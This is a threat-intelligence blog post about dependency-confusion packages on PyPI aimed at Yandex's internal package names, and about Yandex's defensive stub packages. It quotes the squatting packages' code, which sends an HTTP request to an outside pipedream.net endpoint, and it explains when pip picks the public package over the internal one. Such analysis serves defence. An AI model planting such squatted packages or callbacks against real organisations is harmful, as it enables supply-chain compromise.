[ << ALL_FEED ]

Open source passions: mafia, stealers, and bug bounty hunting of Yandex projects

More in General

Open Source Drama: Mafia, Stealers, and Bug Hunting of Yandex Projects 🐱

Over the past two weeks, a lot of interesting things have happened in the Python Package Index. We armed ourselves with the verdicts of the machine learning model from the PT PyAnalysis service to tell you about notable detections.

Bug Hunters vs. Yandex

Back in January 2023, a user with the handle yandex.bughunter registered five packages with different text variations:


import subprocess
import os
import requests

#I am  bughunter
#t.a.neo@yandex.ru
print('it works!')
requests.get("https://76c4[REDACTED]f5d3.m.pipedream.net/example-package-taxi-etl")

import requests
#I am  bughunter
#t.a.neo@yandex.ru
print('If you read this message and you are from Yandex write me t.a.neo@yandex.ru')
requests.get("https://76c4[REDACTED]f5d3.m.pipedream.net/dmp_suite")

The package descriptions are identical: I created this package for security testing. I am bughunter from Yandex.

But it is strange that in the PyPI project metadata, the author identifies themselves as Thomas Anderson <t.a.neo@yandex.ru>, meaning they use a personal email, not corporate ones like @team.yandex.ru / @yandex-team.ru ❕

Not to mention that Thomas Anderson is the very same Mr. Anderson from The Matrix…

This person is simulating a supply-chain attack by registering a package in the global repository with the same name as a package that exists in the internal repository of a specific developer group (in this case, the Yandex team).

Installation of a package from the global repository will occur if:

🔤 The package manager (hereinafter PM) does not support setting download priorities from a list of repositories. There have long been heated debates about pip selecting the best version of a package from all repositories specified in its config. Poetry does not have this problem.

🔤 The PM is not configured to use the internal repository. This could happen on a new device of a new colleague who has not yet completed the onboarding guide.

🔤 The PM config prioritizes the internal repository over the global one, but the internal one is currently unavailable for some reason.

🔤 The PM config prioritizes the global repository over the internal one (“If the package is not in the global repository, then it is our package and should be installed from the internal one”).

A conflict in repository usage order already occurred in December 2022 in the well-known attack on torch nightly releases. The attacker registered the torchtriton library in the global PyPI repository, which was usually pulled from a configured internal repository. The package installation was done via pip: that’s the whole secret of the kill chain.

😰 In August 2024, we noticed that the authorship of one of the packages from user yandex.bughunter was taken over by yandex-bot — an account that owns 1279 packages with interesting names, such as yandex-soc-services-sdk, yandex-cloud-ml-sdk-preview, yandex-infradev-tool…

In all these packages, the author is listed as Yandex <security@yandex-team.ru>. The description states: A package to prevent Dependency Confusion attacks against Yandex, and the packages themselves raise an exception when an attempt is made to install them:


class InstallCommand(install):
    def run(self):
        raise RuntimeError("You are trying to install a stub package yandex-cloud-ml-sdk-preview. Maybe you are using the wrong pypi? See https://nda.ya.ru/t/GljG[REDACTED]zAGGz for details")

We have no details on how yandex.bughunter learned the list of packages from Yandex’s internal kitchen, but it seems the company noticed this and started negotiating with the bug hunter. Or is quietly taking over the packages through PyPI administration 🐱

To be continued…

#ti #pypi #pyanalysis
@ptescalator

More from ti_author

More from ti_author

More in General